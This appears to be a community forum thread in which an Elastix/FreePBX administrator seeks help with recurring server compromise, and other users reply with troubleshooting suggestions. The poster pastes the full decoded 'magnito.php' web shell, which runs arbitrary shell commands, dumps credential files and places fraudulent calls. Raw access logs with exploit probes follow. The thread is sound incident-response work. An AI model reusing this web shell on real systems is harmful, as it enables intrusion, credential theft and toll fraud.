Issabel ISO (Latest): Download Here
Cloud Services: User Portal - Quick Guide
News: Telegram channel
Become a Patron!
  • General
  • Beware: New Elastix 2.5 / 4.0 FreePBX 2.11.0.26 exploit..

Greetings, I sent this to the "Elastix" community a week ago but nobody has answered and quite frankly I am not impressed for they don't care about anything anymore that is not their 3CX thing.

Since Issabel is a fork of Elastix 2.5 and 4.0 that still uses the core programming of the former project and also FreePBX 2.11.0.26 this is something that could potentially happen to Issabel users and I wanted to share it with you all:

POST SENT TO THE ELASTIX FORUMS:

New Elastix 2.5 FreePBX 2.11.0.26 exploit.. please help!

Greetings,

I have seen a couple of posts where users complain about a blank screen after they click on the PBX Configuration tab. Well, I have experienced the same on my server and I have all updates applied to the server both for CentOS 5.11 (defunct now according to Centos.org) and also the remaining Elastix repos on the internet.

The problem is fixed by running "yum reinstall freePBX" but sadly, it is only temporal. It looks like there is some php injection or exploit hackers have found to mess up with freePBX 2.11.0.26 (the latest Elastix installs). The intruders DELETE all php files of the freePBX GUI leaving it unusable and broken. Thank god they do not mess with the databases hence your PBX will still operate, take calls, make calls, record calls, transfer calls, register extensions and more but you won't be able to reach the GUI for further configuration until you reinstall freePBX again.

I have found myself reinstalling freePBX every single day and quite frankly this is getting on my nerves. I even set the firewall to block everything except the local network and the public IP of my customers but regardless, the intruder finds a way to break into the system and delete all php files of FreePBX.

What I found is in the /tmp folder a file called "magnito23.php" "magnito.php" or "MesSI.php" They are base64 encoded but by decoding them I realize they are obtaining admin access by retrieving the password. In addition, in the /var/www/html/_asterisk folder you will also find this "magnito.php" file which clearly means someone is injecting that code.

Oh, and it also messes with the anti hacker module!! You have to upload the license file and reconfigure it completely to make it work properly again.

I have searched for solutions on the internet to no avail. Question is... Has someone found this threat and eliminated it for good? If so, please do share because I am TIRED to reinstall FreePBX in all my servers. Oh, and it happens on Elastix 4.0 with CentOS 7 as well. I have a mix of Elastix 2.5 and 4.0 servers and the same happens on both platforms.

Your help will be greatly appreciated.

Best Regards,

Paul D Fabre

    Could be related with this? -> https://community.freepbx.org/t/hacked-via/40670/39

    If you already close all the external ports the the attacker left a script in your system to trigger an script or reverse connection. Check crontab and folders for unwanted scripts. Also monitor your network and log files to know what is triggered at which time.

    navaismo I have deleted all suspicious scripts and there are no strange additions in the crontab process list.

    Reverse connection could definitely be the problem because after deleting the php files they reappear after a while.

      navaismo maybe there is a script I have not deleted yet.. also, how do I check for reverse connections?

        I have seen hacks with the magnito.php file injected in systems. Analyzing logs, it appears the attack was done to a2billing (on its version 2.2.0). We decided to not install a2billing by default as the issue we discovered is still under investigation as it seems its a non reported exploit.

        As for FreePBX, we are forking it on version 2.11.43, a little bit newer than the one you reported.

        Are you sure the exploit is in FreePBX code and not perhaps a2billing ?

        navaismo Reading that post thoroughly I can tell you that the reason of the problem does not apply to me because I have NO business with Sangoma or FreePBX directly. I've always been an Elastix certified Engineer and the few times (2 to be precise) I needed paid support it was through Elastix and not the Sangoma technicians which kills the possibility of any admin / ssh password leak that hackers captured from their database..

          asternic Nicolás, I have uninstalled A2Billing 2.2.0 completely on all of these affected Elastix boxes because I don't need it there but the problem persists.

          I used yum remove elastix-a2billing and made sure that nothing was left on /var/www/html related to A2Billing. Are there any other remnants of A2Billing that I probably have to look into? Because it seems that the hackers are either gaining access from the Elastix php code or FreePBX 2.11.0.26

            striderec In Elastix 2.5, if you update FreePBX in any way makes PBX Administration mudule show blank screen.

              venturinog No, I'll explain again.. the page goes either blank or shows "HTTP ERROR 500 - internal Server error" AFTER the intruders gain access to the system and delete FreePBX code because if you run "amportal restart" it says it cannot find the directory where the files are located and the start process FAILS.

              After you perform "yum update elastix-freePBX" and you refresh your browser screen you will see everything back. Curiously, this intruder's script also disables the anti hacker module and you have to re-upload the license file, fill in the required fields and start the anti-hacker module once more.

                asternic One of the servers was attacked again... the magnito.php file had a base 64 encoding that I decoded and reads as follows:

                /QM149YYCS6/
                session_name("elastixSession");
                session_start();
                if ((isset($REQUEST['md5']) && md5($REQUEST['md5']) != '7339d7ce6b96d0dc8188e5bcc2adb8cd') || !isset($REQUEST['md5']) && !isset($SESSION['uid'])) {
                echo '<form action="" method="post">';
                echo '<input type="text" placehoder="./hackz" name="md5" />';
                echo '<input type="submit" value="./login" />';
                echo '</form>';
                echo '<? -- ((/my-server-public-ip-address/)) -- ?>';
                exit();
                }
                $SESSION['uid'] = 1;
                if ($
                SESSION['uid']) {
                if ($REQUEST['web'] == 'no') {
                system($
                REQUEST['cmd']);
                } else {
                include_once "/var/www/html/libs/paloSantoDB.class.php";
                include_once "/var/www/html/libs/paloSantoACL.class.php";
                $pDB = new paloDB("sqlite3:////var/www/db/acl.db");
                $db = $pDB->fetchTable("SELECT name, md5_password,extension from acl_user WHERE id ='1'");
                $SESSION['elastix_user'] = $db[0][0];
                $
                SESSION['elastix_pass'] = $db[0][1];

                    echo '<h1 style="text-align: center; color-red">L0RD &nbsp; MAGNITO V1.0</h1>';
                    echo '<style>input,select{height: 30px; padding: 5px; font-weight: bolder;}</style>';
                    echo '<form action="" method="post">';
                    echo '<input type="text" name="context" value="asterisk-outcalls" />';
                    echo '<input type="text" name="time" value="60" />';
                    echo '<input type="text" name="prs" value="00" />';
                    echo '<input type="text" name="num" placeholder="number" />';
                    echo '<input type="submit" name="submit" value="call" />';
                    echo '</form><br />';
                    echo '<form action="" method="post">';
                    echo '<select name="cmd">';
                    echo '<option value="cat /etc/elastix.conf">elastix.conf</option>';
                    echo '<option value="grep AMPDB /etc/amportal.conf">amportal.conf</option>';
                    echo '<option value="cat /etc/asterisk/sip_additional.conf">sip_additional.conf</option>';
                    echo '<option value="cat /etc/asterisk/extensions_custom.conf">extensions_custom.conf</option>';
                    echo '<option value="ps -aux --forest">ps -aux --forest</option>';
                    echo '<option value=\'asterisk -rx "core show channels"\'>active calls</option>';
                    echo '<input type="submit" name="submit" value="exec" />';
                    echo '</form>';
                    echo '<form action="" method="post">';
                    echo '<input type="text" name="cmd" />';
                    echo '<input type="submit" name="submit" value="run" />';
                    echo '</form><br />';
                    echo '<a href="/" >Admin GO</a>';
                    echo '<hr /><pre>';
                    switch ($_REQUEST['submit']) {
                        case 'call':
                            system('asterisk -rx "channel originate Local/' . $_REQUEST['prs'] . $_REQUEST['num'] . '@' . $_REQUEST['context'] . ' application wait ' . $_REQUEST['time'] . '"');
                            break;
                        case 'run':
                        case 'exec':
                            system($_REQUEST['cmd']);
                            break;
                        default:
                            system("grep AMPDB /etc/amportal.conf");
                            break;
                    }
                }

                }
                /SRKX96EXN1WDEBU/

                  Ok, can you find any relevant lines in httpd access log?

                  Check your logs(messages, httpd, secure and dmesg), definetively you have an script triggering this, so you need to find that.

                  Also make a recursive search of the string "magnito" in all your system if the script exist it for sure are creating a file called magnito,

                  venturinog Here is the /etc/httpd/logs/access.log file of yesterday June 9th, 2017:

                  146.0.243.29 - - [09/Jun/2017:00:58:20 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 302 233 "-" "curl/7.29.0"
                  195.154.181.160 - - [09/Jun/2017:01:41:28 -0400] "GET /goautodial-admin/project_auth_entries.txt HTTP/1.1" 302 246 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30"
                  195.154.181.160 - - [09/Jun/2017:01:41:28 -0400] "GET /agc/ HTTP/1.1" 302 209 "-" "-"
                  195.154.181.160 - - [09/Jun/2017:01:41:29 -0400] "POST /CGI/Execute HTTP/1.1" 302 216 "-" "-"
                  139.162.124.167 - - [09/Jun/2017:04:11:28 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0"
                  91.196.50.33 - - [09/Jun/2017:04:27:49 -0400] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 302 225 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
                  115.79.62.252 - - [09/Jun/2017:07:29:30 -0400] "GET / HTTP/1.1" 302 208 "-" "-"
                  180.234.24.160 - - [09/Jun/2017:07:51:48 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
                  180.234.24.160 - - [09/Jun/2017:07:51:50 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  146.0.243.29 - - [09/Jun/2017:08:30:37 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 302 233 "-" "curl/7.29.0"
                  46.246.37.67 - - [09/Jun/2017:08:59:03 -0400] "GET /muieblackcat HTTP/1.1" 302 217 "-" "-"
                  46.246.37.67 - - [09/Jun/2017:08:59:03 -0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 302 233 "-" "-"
                  46.246.37.67 - - [09/Jun/2017:08:59:04 -0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 302 233 "-" "-"
                  46.246.37.67 - - [09/Jun/2017:08:59:04 -0400] "GET //pma/scripts/setup.php HTTP/1.1" 302 226 "-" "-"
                  46.246.37.67 - - [09/Jun/2017:08:59:05 -0400] "GET //myadmin/scripts/setup.php HTTP/1.1" 302 230 "-" "-"
                  46.246.37.67 - - [09/Jun/2017:08:59:05 -0400] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 302 230 "-" "-"
                  ::1 - - [09/Jun/2017:09:24:10 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
                  179.158.22.2 - - [09/Jun/2017:10:09:25 -0400] "GET /hndUnblock.cgi HTTP/1.0" 302 219 "-" "Wget(linux)"
                  179.158.22.2 - - [09/Jun/2017:10:09:26 -0400] "GET /tmUnblock.cgi HTTP/1.0" 302 218 "-" "Wget(linux)"
                  187.39.190.172 - - [09/Jun/2017:10:39:13 -0400] "GET /cgi/common.cgi HTTP/1.0" 302 219 "-" "Wget(linux)"
                  187.39.190.172 - - [09/Jun/2017:10:39:14 -0400] "GET /stssys.htm HTTP/1.0" 302 215 "-" "Wget(linux)"
                  187.39.190.172 - - [09/Jun/2017:10:39:14 -0400] "GET / HTTP/1.0" 302 205 "-" "Wget(linux)"
                  187.39.190.172 - - [09/Jun/2017:10:39:14 -0400] "POST /command.php HTTP/1.0" 302 216 "-" "Wget(linux)"
                  ::1 - - [09/Jun/2017:13:08:37 -0400] "OPTIONS
                  HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
                  37.199.5.125 - - [09/Jun/2017:13:58:29 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  ::1 - - [09/Jun/2017:14:15:08 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
                  51.15.12.13 - - [09/Jun/2017:14:57:22 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 302 237 "-" "-"
                  87.181.110.35 - - [09/Jun/2017:15:53:33 -0400] "POST / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
                  217.79.182.120 - - [09/Jun/2017:16:12:36 -0400] "\x03" 400 226 "-" "-"
                  217.79.182.120 - - [09/Jun/2017:16:12:36 -0400] "\x03" 400 226 "-" "-"
                  146.0.243.29 - - [09/Jun/2017:17:41:55 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 302 233 "-" "curl/7.29.0"
                  45.55.11.143 - - [09/Jun/2017:20:17:43 -0400] "OPTIONS / HTTP/1.1" 400 226 "-" "-"
                  200.116.88.105 - - [09/Jun/2017:21:21:28 -0400] "GET /a2billing/customer/javascript/misc.js HTTP/1.1" 302 242 "-" "curl/7.15.5 (i386-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
                  163.172.69.33 - - [09/Jun/2017:22:01:05 -0400] "GET /recordings//theme/main.css HTTP/1.1" 302 231 "-" "curl/7.29.0"
                  163.172.69.33 - - [09/Jun/2017:22:01:07 -0400] "\x16\x03\x01" 400 226 "-" "-"
                  23.239.70.162 - - [09/Jun/2017:22:19:20 -0400] "GET / HTTP/1.1" 302 205 "-" "libwww-perl/6.23"
                  213.202.233.77 - - [09/Jun/2017:22:47:51 -0400] "GET /admin/ajax.php HTTP/1.1" 302 219 "-" "curl/7.29.0"
                  76.108.242.230 - - [09/Jun/2017:23:15:00 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
                  ::1 - - [09/Jun/2017:23:15:11 -0400] "OPTIONS
                  HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
                  ::1 - - [09/Jun/2017:23:15:12 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
                  ::1 - - [09/Jun/2017:23:15:13 -0400] "OPTIONS
                  HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
                  ::1 - - [09/Jun/2017:23:15:44 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
                  92.114.32.161 - - [09/Jun/2017:23:39:43 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 302 232 "-" "libwww-perl/6.26"
                  92.114.32.161 - - [09/Jun/2017:23:53:55 -0400] "GET /recordings/ HTTP/1.1" 302 216 "-" "libwww-perl/6.26"
                  47.93.186.14 - - [10/Jun/2017:02:00:48 -0400] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 302 246 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:48 -0400] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 302 246 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /pma/scripts/setup.php HTTP/1.1" 302 226 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /pma/scripts/setup.php HTTP/1.1" 302 226 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:51 -0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
                  47.93.186.14 - - [10/Jun/2017:02:00:51 -0400] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
                  ::1 - - [10/Jun/2017:02:00:51 -0400] "OPTIONS
                  HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
                  144.217.173.209 - - [10/Jun/2017:04:02:44 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  144.217.173.212 - - [10/Jun/2017:04:08:14 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  198.50.160.105 - - [10/Jun/2017:04:19:03 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  51.15.12.13 - - [10/Jun/2017:04:55:41 -0400] "GET /recordings/index.php HTTP/1.1" 302 225 "-" "-"
                  51.15.12.13 - - [10/Jun/2017:04:55:43 -0400] "POST /admin/ajax.php?module=music HTTP/1.1" 302 232 "http://204.13.1.139/admin/config.php" "-"
                  51.15.12.13 - - [10/Jun/2017:04:55:44 -0400] "POST /admin/ajax.php?module=blacklist HTTP/1.1" 302 236 "http://204.13.1.139/admin/config.php" "-"
                  51.15.12.13 - - [10/Jun/2017:04:55:45 -0400] "POST /admin/ajax.php?module=recordings HTTP/1.1" 302 237 "http://204.13.1.139/admin/config.php" "-"
                  51.15.12.13 - - [10/Jun/2017:04:55:46 -0400] "GET /admin/ajax.php HTTP/1.1" 302 219 "/admin/index.php" "-"
                  51.15.12.13 - - [10/Jun/2017:04:55:47 -0400] "GET /admin/config.php?display=OpenVAS&handler=api&file=OpenVAS&module=OpenVAS&function=system&args=id HTTP/1.1" 302 321 "-" "-"
                  51.15.12.13 - - [10/Jun/2017:04:55:48 -0400] "GET /admin/modules/backup/page.backup.php HTTP/1.1" 302 241 "-" "-"
                  51.15.12.13 - - [10/Jun/2017:04:55:50 -0400] "POST /vtigercrm/phprint.php HTTP/1.1" 302 226 "http://204.13.1.139/vtigercrm/phprint.php" "-"
                  144.217.173.209 - - [10/Jun/2017:05:04:07 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  183.129.160.229 - - [10/Jun/2017:05:06:26 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
                  144.217.173.212 - - [10/Jun/2017:05:09:51 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  198.50.160.105 - - [10/Jun/2017:05:24:54 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  190.94.141.214 - - [10/Jun/2017:05:42:12 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
                  190.94.141.214 - - [10/Jun/2017:05:42:13 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
                  190.94.141.214 - - [10/Jun/2017:05:42:13 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
                  190.94.141.214 - - [10/Jun/2017:05:42:13 -0400] "GET / HTTP/1.1" 400 226 "-" "masscan/1.0"
                  190.94.141.214 - - [10/Jun/2017:05:42:14 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
                  190.94.141.214 - - [10/Jun/2017:05:42:14 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  190.94.141.214 - - [10/Jun/2017:05:42:15 -0400] "GET / HTTP/1.1" 302 202 "-" "masscan/1.0"
                  144.217.173.212 - - [10/Jun/2017:06:16:52 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  144.217.173.209 - - [10/Jun/2017:06:19:25 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  198.50.160.105 - - [10/Jun/2017:06:38:58 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  1.205.110.99 - - [10/Jun/2017:07:21:35 -0400] "GET login.cgi HTTP/1.0" 400 226 "-" "-"
                  91.196.50.33 - - [10/Jun/2017:07:24:49 -0400] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 302 225 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
                  191.100.11.163 - - [10/Jun/2017:08:28:36 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
                  191.100.11.163 - - [10/Jun/2017:08:28:37 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
                  191.100.11.163 - - [10/Jun/2017:08:28:38 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
                  191.100.11.163 - - [10/Jun/2017:08:28:39 -0400] "GET / HTTP/1.1" 400 226 "-" "masscan/1.0"
                  191.100.11.163 - - [10/Jun/2017:08:28:40 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
                  191.100.11.163 - - [10/Jun/2017:08:28:41 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  191.100.11.163 - - [10/Jun/2017:08:28:41 -0400] "GET / HTTP/1.1" 302 202 "-" "masscan/1.0"
                  139.162.119.197 - - [10/Jun/2017:09:01:21 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
                  144.217.173.212 - - [10/Jun/2017:09:16:10 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  144.217.173.209 - - [10/Jun/2017:09:29:31 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
                  98.242.248.14 - - [10/Jun/2017:09:45:22 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
                  89.163.255.251 - - [10/Jun/2017:09:48:21 -0400] "HEAD / HTTP/1.0" 302 - "-" "-"
                  198.50.160.105 - - [10/Jun/2017:09:50:20 -0400] "GET / HTTP/1.0" 302 193 "-" "-"

                    venturinog And here is the /etc/httpd/logs/ssl_access.log file for yesterday, June 9th, 2017:

                    13.58.12.77 - admin [09/Jun/2017:16:00:50 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:16:00:50 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:16:00:50 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:01:43 -0400] "POST / HTTP/1.1" 200 5409
                    51.15.52.242 - - [09/Jun/2017:16:02:08 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
                    51.15.52.242 - - [09/Jun/2017:16:02:11 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
                    87.181.110.35 - - [09/Jun/2017:16:03:44 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:05:46 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:07:46 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:09:47 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:11:48 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:13:49 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:15:50 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:17:51 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:19:52 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:21:52 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:23:38 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:23:53 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:25:38 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:25:54 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:27:39 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:27:54 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:29:40 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:29:55 -0400] "POST / HTTP/1.1" 200 5409
                    188.161.115.236 - - [09/Jun/2017:16:30:50 -0400] "GET /a2billing/ HTTP/1.1" 404 208
                    99.64.248.239 - - [09/Jun/2017:16:31:40 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:31:56 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:33:41 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:33:57 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:35:42 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:35:58 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:37:42 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:37:58 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:39:43 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:39:59 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:41:43 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:42:00 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:43:43 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:44:01 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:45:44 -0400] "POST / HTTP/1.1" 200 5409
                    51.15.52.242 - - [09/Jun/2017:16:45:59 -0400] "GET / HTTP/1.0" 400 362
                    51.15.52.242 - - [09/Jun/2017:16:46:00 -0400] "GET /recordings//theme/main.css HTTP/1.1" 200 184
                    87.181.110.35 - - [09/Jun/2017:16:46:01 -0400] "POST / HTTP/1.1" 200 5409
                    51.15.52.242 - - [09/Jun/2017:16:47:37 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
                    51.15.52.242 - - [09/Jun/2017:16:47:38 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
                    99.64.248.239 - - [09/Jun/2017:16:47:44 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:48:02 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:49:44 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:50:02 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:51:45 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:52:03 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:53:45 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:54:04 -0400] "POST / HTTP/1.1" 200 5409
                    13.58.12.77 - admin [09/Jun/2017:16:55:00 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - admin [09/Jun/2017:16:55:00 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:16:55:00 -0400] "POST / HTTP/1.1" 200 5409
                    13.58.12.77 - - [09/Jun/2017:16:55:00 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
                    99.64.248.239 - - [09/Jun/2017:16:55:45 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:56:04 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:57:46 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:58:05 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:59:46 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:00:05 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:02:06 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:04:07 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:06:07 -0400] "POST / HTTP/1.1" 200 5409
                    13.58.12.77 - admin [09/Jun/2017:17:06:08 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - admin [09/Jun/2017:17:06:08 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:17:06:08 -0400] "POST / HTTP/1.1" 200 5409
                    13.58.12.77 - - [09/Jun/2017:17:06:08 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
                    87.181.110.35 - - [09/Jun/2017:17:08:08 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:10:10 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:12:12 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:14:13 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:16:13 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:18:14 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:20:14 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:22:15 -0400] "POST / HTTP/1.1" 200 5409
